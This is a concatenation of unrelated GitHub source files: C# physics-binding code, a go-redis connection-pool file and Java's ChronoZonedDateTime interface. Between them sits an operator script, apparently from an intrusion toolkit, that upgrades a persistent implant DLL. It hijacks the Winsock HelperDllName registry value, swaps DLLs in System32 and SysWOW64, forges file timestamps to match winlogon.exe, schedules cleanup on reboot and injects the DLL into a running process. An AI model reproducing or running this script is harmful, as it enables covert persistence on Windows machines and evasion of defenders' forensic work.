return btVoronoiSimplexSolver_closestPtPointTriangle(Native, ref p,
ref a, ref b, ref c, result.Native);
}
public bool ClosestPtPointTriangle(Vector3 p, Vector3 a, Vector3 b, Vector3 c,
SubSimplexClosestResult result)
{
return btVoronoiSimplexSolver_closestPtPointTriangle(Native, ref p,
ref a, ref b, ref c, result.Native);
}
public void ComputePoints(out Vector3 p1, out Vector3 p2)
{
btVoronoiSimplexSolver_compute_points(Native, out p1, out p2);
}
public bool EmptySimplex()
{
return btVoronoiSimplexSolver_emptySimplex(Native);
}
public bool FullSimplex()
{
return btVoronoiSimplexSolver_fullSimplex(Native);
}
/*
public int GetSimplex(Vector3[] pBuf, Vector3[] qBuf, Vector3[] yBuf)
{
return btVoronoiSimplexSolver_getSimplex(Native, pBuf, qBuf,
yBuf);
}
*/
public bool InSimplex(Vector3 w)
{
return btVoronoiSimplexSolver_inSimplex(Native, ref w);
}
public double MaxVertex()
{
return btVoronoiSimplexSolver_maxVertex(Native);
}
public int PointOutsideOfPlane(Vector3 p, Vector3 a, Vector3 b, Vector3 c,
Vector3 d)
{
return btVoronoiSimplexSolver_pointOutsideOfPlane(Native, ref p, ref a,
ref b, ref c, ref d);
}
public void ReduceVertices(UsageBitfield usedVerts)
{
btVoronoiSimplexSolver_reduceVertices(Native, usedVerts.Native);
}
public void RemoveVertex(int index)
{
btVoronoiSimplexSolver_removeVertex(Native, index);
}
public void Reset()
{
btVoronoiSimplexSolver_reset(Native);
}
public bool UpdateClosestVectorAndPoints()
{
return btVoronoiSimplexSolver_updateClosestVectorAndPoints(Native);
}
public SubSimplexClosestResult CachedBC
{
get => new SubSimplexClosestResult(btVoronoiSimplexSolver_getCachedBC(Native));
set => btVoronoiSimplexSolver_setCachedBC(Native, value.Native);
}
public Vector3 CachedP1
{
get
{
Vector3 value;
btVoronoiSimplexSolver_getCachedP1(Native, out value);
return value;
}
set => btVoronoiSimplexSolver_setCachedP1(Native, ref value);
}
public Vector3 CachedP2
{
get
{
Vector3 value;
btVoronoiSimplexSolver_getCachedP2(Native, out value);
return value;
}
set => btVoronoiSimplexSolver_setCachedP2(Native, ref value);
}
public Vector3 CachedV
{
get
{
Vector3 value;
btVoronoiSimplexSolver_getCachedV(Native, out value);
return value;
}
set => btVoronoiSimplexSolver_setCachedV(Native, ref value);
}
public bool CachedValidClosest
{
get => btVoronoiSimplexSolver_getCachedValidClosest(Native);
set => btVoronoiSimplexSolver_setCachedValidClosest(Native, value);
}
public double EqualVertexThreshold
{
get => btVoronoiSimplexSolver_getEqualVertexThreshold(Native);
set => btVoronoiSimplexSolver_setEqualVertexThreshold(Native, value);
}
public Vector3 LastW
{
get
{
Vector3 value;
btVoronoiSimplexSolver_getLastW(Native, out value);
return value;
}
set => btVoronoiSimplexSolver_setLastW(Native, ref value);
}
public bool NeedsUpdate
{
get => btVoronoiSimplexSolver_getNeedsUpdate(Native);
set => btVoronoiSimplexSolver_setNeedsUpdate(Native, value);
}
public int NumVertices
{
get => btVoronoiSimplexSolver_getNumVertices(Native);
set => btVoronoiSimplexSolver_setNumVertices(Native, value);
}
/*
public Vector3[] SimplexPointsP
{
get { return btVoronoiSimplexSolver_getSimplexPointsP(Native); }
}
public Vector3[] SimplexPointsQ
{
get { return btVoronoiSimplexSolver_getSimplexPointsQ(Native); }
}
public Vector3[] SimplexVectorW
{
get { return btVoronoiSimplexSolver_getSimplexVectorW(Native); }
}
*/
public void Dispose()
{
Dispose(true);
GC.SuppressFinalize(this);
}
protected virtual void Dispose(bool disposing)
{
if (Native != IntPtr.Zero)
{
if (!_preventDelete)
{
btVoronoiSimplexSolver_delete(Native);
}
Native = IntPtr.Zero;
}
}
~VoronoiSimplexSolver()
{
Dispose(false);
}
}
}
| {
"pile_set_name": "Github"
} |
@include "_File.dsi";
@include "_Paths.dsi";
@include "_Processes.dsi";
@include "_Versions.dsi";
@include "windows/_RegistryIncludes.dsi";
@echo off;
@disablewow64 on;
if ($argc != 3)
{
echo("* Invalid parmeters", ERROR);
echo();
echo("Usage: $argv[0] <localFile> <procName>");
return false;
}
string $localFile = $argv[1];
string $procName = $argv[2];
string $arch;
_GetArch($arch);
string $regKey = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Winsock";
string $regKeyValue = "HelperDllName";
string $defaultPath = "\%\%SystemRoot\%\%\\System32";
# get install name and path
string $payloadPath = $defaultPath;
string $payloadName = "wshencrp.dll";
string $payloadLoadPath = $defaultPath;
string $payloadLoadName = "wshencrt.dll";
string $payloadDeletePath = $defaultPath;
string $payloadDeleteName = "wshencrr.dll";
if (!GetInput("PC DLL install path", $payloadPath, $payloadPath) ||
!GetInput("PC DLL install name", $payloadName, $payloadName) ||
!GetInput("PC DLL temporary (to load) path", $payloadLoadPath, $payloadLoadPath) ||
!GetInput("PC DLL temporary (to load) name", $payloadLoadName, $payloadLoadName) ||
!GetInput("PC DLL temporary (to delete) path", $payloadDeletePath, $payloadDeletePath) ||
!GetInput("PC DLL temporary (to delete) name", $payloadDeleteName, $payloadDeleteName))
{
echo("* Failed to get PC names and paths", ERROR);
return false;
}
# get the system path
string $sysPath;
if (!_GetSystemPath($sysPath))
{
echo("* Failed to get system path", ERROR);
return false;
}
# get the HelperDllName value
string $origKeyValue;
if (!_GetRegistryValue("L",
$regKey,
$regKeyValue,
$origKeyValue) || !defined($origKeyValue))
{
$origKeyValue = "";
}
if ($origKeyValue != "$payloadPath\\$payloadName")
{
echo("* Failed to find $payloadPath\\$payloadName in $regKeyValue key", ERROR);
return false;
}
# get the process id for injection
int $id;
if (prompt("Do you want to perform injection (for instant-grat)? Answer NO if using the same host process as old version!", false))
{
if (StrLen($procName) > 0)
{
if (!_FindProcessOnList($procName, $id) || !defined($id))
{
echo("* Failed to find $procName", ERROR);
}
}
# make sure the user wants to keep going if we don't have a process
if (!defined($id))
{
echo("No process for injection", ERROR);
if (!prompt("Continue?"))
{
return false;
}
}
}
string $usePath = $payloadPath;
if ($usePath == $defaultPath)
{
$usePath = $sysPath;
}
string $useLoadPath = $payloadLoadPath;
if ($useLoadPath == $defaultPath)
{
$useLoadPath = $sysPath;
}
string $useDeletePath = $payloadDeletePath;
if ($useDeletePath == $defaultPath)
{
$useDeletePath = $sysPath;
}
# upload the new file
echo "Uploading new PC";
if (!`put "$localFile" -name "$useLoadPath\\$payloadLoadName" -permanent`)
{
echo(" FAILED", ERROR);
pause;
return false;
}
echo(" FINISHED", GOOD);
# move the old file
echo "Moving old PC";
if (!`move "$usePath\\$payloadName" "$useDeletePath\\$payloadDeleteName"`)
{
echo(" FAILED", ERROR);
echo "Performing recovery";
if (!`delete -file "$useLoadPath\\$payloadLoadName"`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" RECOVERED", GOOD);
}
pause;
return false;
}
echo(" FINISHED", GOOD);
# copy the new file to its final location
echo "Copying new PC to permanent location";
if (!`copy "$useLoadPath\\$payloadLoadName" "$usePath\\$payloadName"`)
{
echo(" FAILED", ERROR);
echo "Performing recovery";
if (!`move "$useDeletePath\\$payloadDeleteName" "$usePath\\$payloadName"` ||
!`delete -file "$useLoadPath\\$payloadLoadName"`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" RECOVERED", GOOD);
}
pause;
return false;
}
echo(" FINISHED", GOOD);
string $matchName = "user.exe";
if ($arch == "x64")
{
# alternative match name for x64.
$matchName = "winlogon.exe";
echo "Copying SysWOW64 helper DLL";
string $homonymousDll;
$homonymousDll = "$sysPath\\$payloadName";
RegExSub("system32","SysWOW64",$homonymousDll);
# First see if we're upgrading from a PC install that was aware of this bug:
if(_FileExists($homonymousDll))
{
echo(" DONE ALREADY (OK)", GOOD);
}
else
{
# In the normal case, the "orig" file will exist, use that (would be a copy of wshtcpip if PC installed).
# Otherwise, fall back to wshtcpip.dll (someone else broke it, we'll fix it anyway).
string $origSW64Dll;
$origSW64Dll = $origKeyValue;
@regex-global on;
RegExSub("^.*\\\\", "", $origSW64Dll);
@regex-global off;
$origSW64Dll = "$sysPath\\$origSW64Dll";
RegExSub("system32","SysWOW64",$origSW64Dll);
if(!_FileExists($origSW64Dll))
{
# Upgrading from 2.2 and prior, this is actually the expected path, no need to warn here.
$origSW64Dll = "$sysPath\\wshtcpip.dll";
RegExSub("system32","SysWOW64",$origSW64Dll);
}
if(!_FileExists($origSW64Dll))
{
echo(" FAILED (no $origSW64Dll)", ERROR);
pause;
# continue...
}
else
{
if(!`copy $origSW64Dll $homonymousDll`)
{
echo(" FAILED (could not copy source)", ERROR);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
echo "Matching SysWOW64 filetimes";
if (!`matchfiletimes -src "$origSW64Dll" -dst "$homonymousDll"`)
{
echo(" FAILED (times not matched)", ERROR);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
}
}
}
}
}
echo "Matching filetimes with $matchName";
if (!`matchfiletimes -src "$sysPath\\$matchName" -dst "$usePath\\$payloadName"` ||
!`matchfiletimes -src "$sysPath\\$matchName" -dst "$useLoadPath\\$payloadLoadName"` ||
!`matchfiletimes -src "$sysPath\\$matchName" -dst "$useDeletePath\\$payloadDeleteName"`)
{
echo(" FAILED", WARNING);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
}
# mark the temp files for deletion
`delete -file "$useLoadPath\\$payloadLoadName" -afterreboot`;
`delete -file "$useDeletePath\\$payloadDeleteName" -afterreboot`;
if (defined($id))
{
# inject the DLL
echo "Injecting DLL";
if (!`injectdll -library $payloadLoadName -id $id`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" INJECTED", GOOD);
}
}
echo "Upgrade Finished";
echo "$regKeyValue : '$origKeyValue'";
pause;
return true;
| {
"pile_set_name": "Github"
} |
package pool
import (
"net"
"sync/atomic"
"time"
"github.com/go-redis/redis/internal/proto"
)
var noDeadline = time.Time{}
type Conn struct {
netConn net.Conn
Rd *proto.Reader
Wb *proto.WriteBuffer
Inited bool
usedAt atomic.Value
}
func NewConn(netConn net.Conn) *Conn {
cn := &Conn{
netConn: netConn,
Wb: proto.NewWriteBuffer(),
}
cn.Rd = proto.NewReader(cn.netConn)
cn.SetUsedAt(time.Now())
return cn
}
func (cn *Conn) UsedAt() time.Time {
return cn.usedAt.Load().(time.Time)
}
func (cn *Conn) SetUsedAt(tm time.Time) {
cn.usedAt.Store(tm)
}
func (cn *Conn) SetNetConn(netConn net.Conn) {
cn.netConn = netConn
cn.Rd.Reset(netConn)
}
func (cn *Conn) IsStale(timeout time.Duration) bool {
return timeout > 0 && time.Since(cn.UsedAt()) > timeout
}
func (cn *Conn) SetReadTimeout(timeout time.Duration) error {
now := time.Now()
cn.SetUsedAt(now)
if timeout > 0 {
return cn.netConn.SetReadDeadline(now.Add(timeout))
}
return cn.netConn.SetReadDeadline(noDeadline)
}
func (cn *Conn) SetWriteTimeout(timeout time.Duration) error {
now := time.Now()
cn.SetUsedAt(now)
if timeout > 0 {
return cn.netConn.SetWriteDeadline(now.Add(timeout))
}
return cn.netConn.SetWriteDeadline(noDeadline)
}
func (cn *Conn) Write(b []byte) (int, error) {
return cn.netConn.Write(b)
}
func (cn *Conn) RemoteAddr() net.Addr {
return cn.netConn.RemoteAddr()
}
func (cn *Conn) Close() error {
return cn.netConn.Close()
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2012, 2015, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
/*
* This file is available under and governed by the GNU General Public
* License version 2 only, as published by the Free Software Foundation.
* However, the following notice accompanied the original version of this
* file:
*
* Copyright (c) 2007-2012, Stephen Colebourne & Michael Nascimento Santos
*
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* * Neither the name of JSR-310 nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package java.time.chrono;
import static java.time.temporal.ChronoField.INSTANT_SECONDS;
import static java.time.temporal.ChronoField.OFFSET_SECONDS;
import static java.time.temporal.ChronoUnit.FOREVER;
import static java.time.temporal.ChronoUnit.NANOS;
import java.time.DateTimeException;
import java.time.Instant;
import java.time.LocalTime;
import java.time.ZoneId;
import java.time.ZoneOffset;
import java.time.ZonedDateTime;
import java.time.format.DateTimeFormatter;
import java.time.temporal.ChronoField;
import java.time.temporal.ChronoUnit;
import java.time.temporal.Temporal;
import java.time.temporal.TemporalAccessor;
import java.time.temporal.TemporalAdjuster;
import java.time.temporal.TemporalAmount;
import java.time.temporal.TemporalField;
import java.time.temporal.TemporalQueries;
import java.time.temporal.TemporalQuery;
import java.time.temporal.TemporalUnit;
import java.time.temporal.UnsupportedTemporalTypeException;
import java.time.temporal.ValueRange;
import java.util.Comparator;
import java.util.Objects;
/**
* A date-time with a time-zone in an arbitrary chronology,
* intended for advanced globalization use cases.
* <p>
* <b>Most applications should declare method signatures, fields and variables
* as {@link ZonedDateTime}, not this interface.</b>
* <p>
* A {@code ChronoZonedDateTime} is the abstract representation of an offset date-time
* where the {@code Chronology chronology}, or calendar system, is pluggable.
* The date-time is defined in terms of fields expressed by {@link TemporalField},
* where most common implementations are defined in {@link ChronoField}.
* The chronology defines how the calendar system operates and the meaning of
* the standard fields.
*
* <h3>When to use this interface</h3>
* The design of the API encourages the use of {@code ZonedDateTime} rather than this
* interface, even in the case where the application needs to deal with multiple
* calendar systems. The rationale for this is explored in detail in {@link ChronoLocalDate}.
* <p>
* Ensure that the discussion in {@code ChronoLocalDate} has been read and understood
* before using this interface.
*
* @implSpec
* This interface must be implemented with care to ensure other classes operate correctly.
* All implementations that can be instantiated must be final, immutable and thread-safe.
* Subclasses should be Serializable wherever possible.
*
* @param <D> the concrete type for the date of this date-time
* @since 1.8
*/
public interface ChronoZonedDateTime<D extends ChronoLocalDate>
extends Temporal, Comparable<ChronoZonedDateTime<?>> {
/**
* Gets a comparator that compares {@code ChronoZonedDateTime} in
* time-line order ignoring the chronology.
* <p>
* This comparator differs from the comparison in {@link #compareTo} in that it
* only compares the underlying instant and not the chronology.
* This allows dates in different calendar systems to be compared based
* on the position of the date-time on the instant time-line.
* The underlying comparison is equivalent to comparing the epoch-second and nano-of-second.
*
* @return a comparator that compares in time-line order ignoring the chronology
* @see #isAfter
* @see #isBefore
* @see #isEqual
*/
static Comparator<ChronoZonedDateTime<?>> timeLineOrder() {
return AbstractChronology.INSTANT_ORDER;
}
//-----------------------------------------------------------------------
/**
* Obtains an instance of {@code ChronoZonedDateTime} from a temporal object.
* <p>
* This creates a zoned date-time based on the specified temporal.
* A {@code TemporalAccessor} represents an arbitrary set of date and time information,
* which this factory converts to an instance of {@code ChronoZonedDateTime}.
* <p>
* The conversion extracts and combines the chronology, date, time and zone
* from the temporal object. The behavior is equivalent to using
* {@link Chronology#zonedDateTime(TemporalAccessor)} with the extracted chronology.
* Implementations are permitted to perform optimizations such as accessing
* those fields that are equivalent to the relevant objects.
* <p>
* This method matches the signature of the functional interface {@link TemporalQuery}
* allowing it to be used as a query via method reference, {@code ChronoZonedDateTime::from}.
*
* @param temporal the temporal object to convert, not null
* @return the date-time, not null
* @throws DateTimeException if unable to convert to a {@code ChronoZonedDateTime}
* @see Chronology#zonedDateTime(TemporalAccessor)
*/
static ChronoZonedDateTime<?> from(TemporalAccessor temporal) {
if (temporal instanceof ChronoZonedDateTime) {
return (ChronoZonedDateTime<?>) temporal;
}
Objects.requireNonNull(temporal, "temporal");
Chronology chrono = temporal.query(TemporalQueries.chronology());
if (chrono == null) {
throw new DateTimeException("Unable to obtain ChronoZonedDateTime from TemporalAccessor: " + temporal.getClass());
}
return chrono.zonedDateTime(temporal);
}
//-----------------------------------------------------------------------
@Override
default ValueRange range(TemporalField field) {
if (field instanceof ChronoField) {
if (field == INSTANT_SECONDS || field == OFFSET_SECONDS) {
return field.range();
}
return toLocalDateTime().range(field);
}
return field.rangeRefinedBy(this);
}
@Override
default int get(TemporalField field) {
if (field instanceof ChronoField) {
switch ((ChronoField) field) {
case INSTANT_SECONDS:
throw new UnsupportedTemporalTypeException("Invalid field 'InstantSeconds' for get() method, use getLong() instead");
case OFFSET_SECONDS:
return getOffset().getTotalSeconds();
}
return toLocalDateTime().get(field);
}
return Temporal.super.get(field);
}
@Override
default long getLong(TemporalField field) {
if (field instanceof ChronoField) {
switch ((ChronoField) field) {
case INSTANT_SECONDS: return toEpochSecond();
case OFFSET_SECONDS: return getOffset().getTotalSeconds();
}
return toLocalDateTime().getLong(field);
}
return field.getFrom(this);
}
/**
* Gets the local date part of this date-time.
* <p>
* This returns a local date with the same year, month and day
* as this date-time.
*
* @return the date part of this date-time, not null
*/
default D toLocalDate() {
return toLocalDateTime().toLocalDate();
}
/**
* Gets the local time part of this date-time.
* <p>
* This returns a local time with the same hour, minute, second and
* nanosecond as this date-time.
*
* @return the time part of this date-time, not null
*/
default LocalTime toLocalTime() {
return toLocalDateTime().toLocalTime();
}
/**
* Gets the local date-time part of this date-time.
* <p>
* This returns a local date-time with the same year, month, day and
* time as this date-time.
*
* @return the local date-time part of this date-time, not null
*/
ChronoLocalDateTime<D> toLocalDateTime();
/**
* Gets the chronology of this date-time.
* <p>
* The {@code Chronology} represents the calendar system in use.
* The era and other fields in {@link ChronoField} are defined by the chronology.
*
* @return the chronology, not null
*/
default Chronology getChronology() {
return toLocalDate().getChronology();
}
/**
* Gets the zone offset, such as '+01:00'.
* <p>
* This is the offset of the local date-time from UTC/Greenwich.
*
* @return the zone offset, not null
*/
ZoneOffset getOffset();
/**
* Gets the zone ID, such as 'Europe/Paris'.
* <p>
* This returns the stored time-zone id used to determine the time-zone rules.
*
* @return the zone ID, not null
*/
ZoneId getZone();
//-----------------------------------------------------------------------
/**
* Returns a copy of this date-time changing the zone offset to the
* earlier of the two valid offsets at a local time-line overlap.
* <p>
* This method only has any effect when the local time-line overlaps, such as
* at an autumn daylight savings cutover. In this scenario, there are two
* valid offsets for the local date-time. Calling this method will return
* a zoned date-time with the earlier of the two selected.
* <p>
* If this method is called when it is not an overlap, {@code this}
* is returned.
* <p>
* This instance is immutable and unaffected by this method call.
*
* @return a {@code ChronoZonedDateTime} based on this date-time with the earlier offset, not null
* @throws DateTimeException if no rules can be found for the zone
* @throws DateTimeException if no rules are valid for this date-time
*/
ChronoZonedDateTime<D> withEarlierOffsetAtOverlap();
/**
* Returns a copy of this date-time changing the zone offset to the
* later of the two valid offsets at a local time-line overlap.
* <p>
* This method only has any effect when the local time-line overlaps, such as
* at an autumn daylight savings cutover. In this scenario, there are two
* valid offsets for the local date-time. Calling this method will return
* a zoned date-time with the later of the two selected.
* <p>
* If this method is called when it is not an overlap, {@code this}
* is returned.
* <p>
* This instance is immutable and unaffected by this method call.
*
* @return a {@code ChronoZonedDateTime} based on this date-time with the later offset, not null
* @throws DateTimeException if no rules can be found for the zone
* @throws DateTimeException if no rules are valid for this date-time
*/
ChronoZonedDateTime<D> withLaterOffsetAtOverlap();
/**
* Returns a copy of this date-time with a different time-zone,
* retaining the local date-time if possible.
* <p>
* This method changes the time-zone and retains the local date-time.
* The local date-time is only changed if it is invalid for the new zone.
* <p>
* To change the zone and adjust the local date-time,
* use {@link #withZoneSameInstant(ZoneId)}.
* <p>
* This instance is immutable and unaffected by this method call.
*
* @param zone the time-zone to change to, not null
* @return a {@code ChronoZonedDateTime} based on this date-time with the requested zone, not null
*/
ChronoZonedDateTime<D> withZoneSameLocal(ZoneId zone);
/**
* Returns a copy of this date-time with a different time-zone,
* retaining the instant.
* <p>
* This method changes the time-zone and retains the instant.
* This normally results in a change to the local date-time.
* <p>
* This method is based on retaining the same instant, thus gaps and overlaps
* in the local time-line have no effect on the result.
* <p>
* To change the offset while keeping the local time,
* use {@link #withZoneSameLocal(ZoneId)}.
*
* @param zone the time-zone to change to, not null
* @return a {@code ChronoZonedDateTime} based on this date-time with the requested zone, not null
* @throws DateTimeException if the result exceeds the supported date range
*/
ChronoZonedDateTime<D> withZoneSameInstant(ZoneId zone);
/**
* Checks if the specified field is supported.
* <p>
* This checks if the specified field can be queried on this date-time.
* If false, then calling the {@link #range(TemporalField) range},
* {@link #get(TemporalField) get} and {@link #with(TemporalField, long)}
* methods will throw an exception.
* <p>
* The set of supported fields is defined by the chronology and normally includes
* all {@code ChronoField} fields.
* <p>
* If the field is not a {@code ChronoField}, then the result of this method
* is obtained by invoking {@code TemporalField.isSupportedBy(TemporalAccessor)}
* passing {@code this} as the argument.
* Whether the field is supported is determined by the field.
*
* @param field the field to check, null returns false
* @return true if the field can be queried, false if not
*/
@Override
boolean isSupported(TemporalField field);
/**
* Checks if the specified unit is supported.
* <p>
* This checks if the specified unit can be added to or subtracted from this date-time.
* If false, then calling the {@link #plus(long, TemporalUnit)} and
* {@link #minus(long, TemporalUnit) minus} methods will throw an exception.
* <p>
* The set of supported units is defined by the chronology and normally includes
* all {@code ChronoUnit} units except {@code FOREVER}.
* <p>
* If the unit is not a {@code ChronoUnit}, then the result of this method
* is obtained by invoking {@code TemporalUnit.isSupportedBy(Temporal)}
* passing {@code this} as the argument.
* Whether the unit is supported is determined by the unit.
*
* @param unit the unit to check, null returns false
* @return true if the unit can be added/subtracted, false if not
*/
@Override
default boolean isSupported(TemporalUnit unit) {
if (unit instanceof ChronoUnit) {
return unit != FOREVER;
}
return unit != null && unit.isSupportedBy(this);
}
//-----------------------------------------------------------------------
// override for covariant return type
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
default ChronoZonedDateTime<D> with(TemporalAdjuster adjuster) {
return ChronoZonedDateTimeImpl.ensureValid(getChronology(), Temporal.super.with(adjuster));
}
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
ChronoZonedDateTime<D> with(TemporalField field, long newValue);
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
default ChronoZonedDateTime<D> plus(TemporalAmount amount) {
return ChronoZonedDateTimeImpl.ensureValid(getChronology(), Temporal.super.plus(amount));
}
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
ChronoZonedDateTime<D> plus(long amountToAdd, TemporalUnit unit);
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
default ChronoZonedDateTime<D> minus(TemporalAmount amount) {
return ChronoZonedDateTimeImpl.ensureValid(getChronology(), Temporal.super.minus(amount));
}
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
default ChronoZonedDateTime<D> minus(long amountToSubtract, TemporalUnit unit) {
return ChronoZonedDateTimeImpl.ensureValid(getChronology(), Temporal.super.minus(amountToSubtract, unit));
}
//-----------------------------------------------------------------------
/**
* Queries this date-time using the specified query.
* <p>
* This queries this date-time using the specified query strategy object.
* The {@code TemporalQuery} object defines the logic to be used to
* obtain the result. Read the documentation of the query to understand
* what the result of this method will be.
* <p>
* The result of this method is obtained by invoking the
* {@link TemporalQuery#queryFrom(TemporalAccessor)} method on the
* specified query passing {@code this} as the argument.
*
* @param <R> the type of the result
* @param query the query to invoke, not null
* @return the query result, null may be returned (defined by the query)
* @throws DateTimeException if unable to query (defined by the query)
* @throws ArithmeticException if numeric overflow occurs (defined by the query)
*/
@SuppressWarnings("unchecked")
@Override
default <R> R query(TemporalQuery<R> query) {
if (query == TemporalQueries.zone() || query == TemporalQueries.zoneId()) {
return (R) getZone();
} else if (query == TemporalQueries.offset()) {
return (R) getOffset();
} else if (query == TemporalQueries.localTime()) {
return (R) toLocalTime();
} else if (query == TemporalQueries.chronology()) {
return (R) getChronology();
} else if (query == TemporalQueries.precision()) {
return (R) NANOS;
}
// inline TemporalAccessor.super.query(query) as an optimization
// non-JDK classes are not permitted to make this optimization
return query.queryFrom(this);
}
/**
* Formats this date-time using the specified formatter.
* <p>
* This date-time will be passed to the formatter to produce a string.
* <p>
* The default implementation must behave as follows:
* <pre>
* return formatter.format(this);
* </pre>
*
* @param formatter the formatter to use, not null
* @return the formatted date-time string, not null
* @throws DateTimeException if an error occurs during printing
*/
default String format(DateTimeFormatter formatter) {
Objects.requireNonNull(formatter, "formatter");
return formatter.format(this);
}
//-----------------------------------------------------------------------
/**
* Converts this date-time to an {@code Instant}.
* <p>
* This returns an {@code Instant} representing the same point on the
* time-line as this date-time. The calculation combines the
* {@linkplain #toLocalDateTime() local date-time} and
* {@linkplain #getOffset() offset}.
*
* @return an {@code Instant} representing the same instant, not null
*/
default Instant toInstant() {
return Instant.ofEpochSecond(toEpochSecond(), toLocalTime().getNano());
}
/**
* Converts this date-time to the number of seconds from the epoch
* of 1970-01-01T00:00:00Z.
* <p>
* This uses the {@linkplain #toLocalDateTime() local date-time} and
* {@linkplain #getOffset() offset} to calculate the epoch-second value,
* which is the number of elapsed seconds from 1970-01-01T00:00:00Z.
* Instants on the time-line after the epoch are positive, earlier are negative.
*
* @return the number of seconds from the epoch of 1970-01-01T00:00:00Z
*/
default long toEpochSecond() {
long epochDay = toLocalDate().toEpochDay();
long secs = epochDay * 86400 + toLocalTime().toSecondOfDay();
secs -= getOffset().getTotalSeconds();
return secs;
}
//-----------------------------------------------------------------------
/**
* Compares this date-time to another date-time, including the chronology.
* <p>
* The comparison is based first on the instant, then on the local date-time,
* then on the zone ID, then on the chronology.
* It is "consistent with equals", as defined by {@link Comparable}.
* <p>
* If all the date-time objects being compared are in the same chronology, then the
* additional chronology stage is not required.
* <p>
* This default implementation performs the comparison defined above.
*
* @param other the other date-time to compare to, not null
* @return the comparator value, negative if less, positive if greater
*/
@Override
default int compareTo(ChronoZonedDateTime<?> other) {
int cmp = Long.compare(toEpochSecond(), other.toEpochSecond());
if (cmp == 0) {
cmp = toLocalTime().getNano() - other.toLocalTime().getNano();
if (cmp == 0) {
cmp = toLocalDateTime().compareTo(other.toLocalDateTime());
if (cmp == 0) {
cmp = getZone().getId().compareTo(other.getZone().getId());
if (cmp == 0) {
cmp = getChronology().compareTo(other.getChronology());
}
}
}
}
return cmp;
}
/**
* Checks if the instant of this date-time is before that of the specified date-time.
* <p>
* This method differs from the comparison in {@link #compareTo} in that it
* only compares the instant of the date-time. This is equivalent to using
* {@code dateTime1.toInstant().isBefore(dateTime2.toInstant());}.
* <p>
* This default implementation performs the comparison based on the epoch-second
* and nano-of-second.
*
* @param other the other date-time to compare to, not null
* @return true if this point is before the specified date-time
*/
default boolean isBefore(ChronoZonedDateTime<?> other) {
long thisEpochSec = toEpochSecond();
long otherEpochSec = other.toEpochSecond();
return thisEpochSec < otherEpochSec ||
(thisEpochSec == otherEpochSec && toLocalTime().getNano() < other.toLocalTime().getNano());
}
/**
* Checks if the instant of this date-time is after that of the specified date-time.
* <p>
* This method differs from the comparison in {@link #compareTo} in that it
* only compares the instant of the date-time. This is equivalent to using
* {@code dateTime1.toInstant().isAfter(dateTime2.toInstant());}.
* <p>
* This default implementation performs the comparison based on the epoch-second
* and nano-of-second.
*
* @param other the other date-time to compare to, not null
* @return true if this is after the specified date-time
*/
default boolean isAfter(ChronoZonedDateTime<?> other) {
long thisEpochSec = toEpochSecond();
long otherEpochSec = other.toEpochSecond();
return thisEpochSec > otherEpochSec ||
(thisEpochSec == otherEpochSec && toLocalTime().getNano() > other.toLocalTime().getNano());
}
/**
* Checks if the instant of this date-time is equal to that of the specified date-time.
* <p>
* This method differs from the comparison in {@link #compareTo} and {@link #equals}
* in that it only compares the instant of the date-time. This is equivalent to using
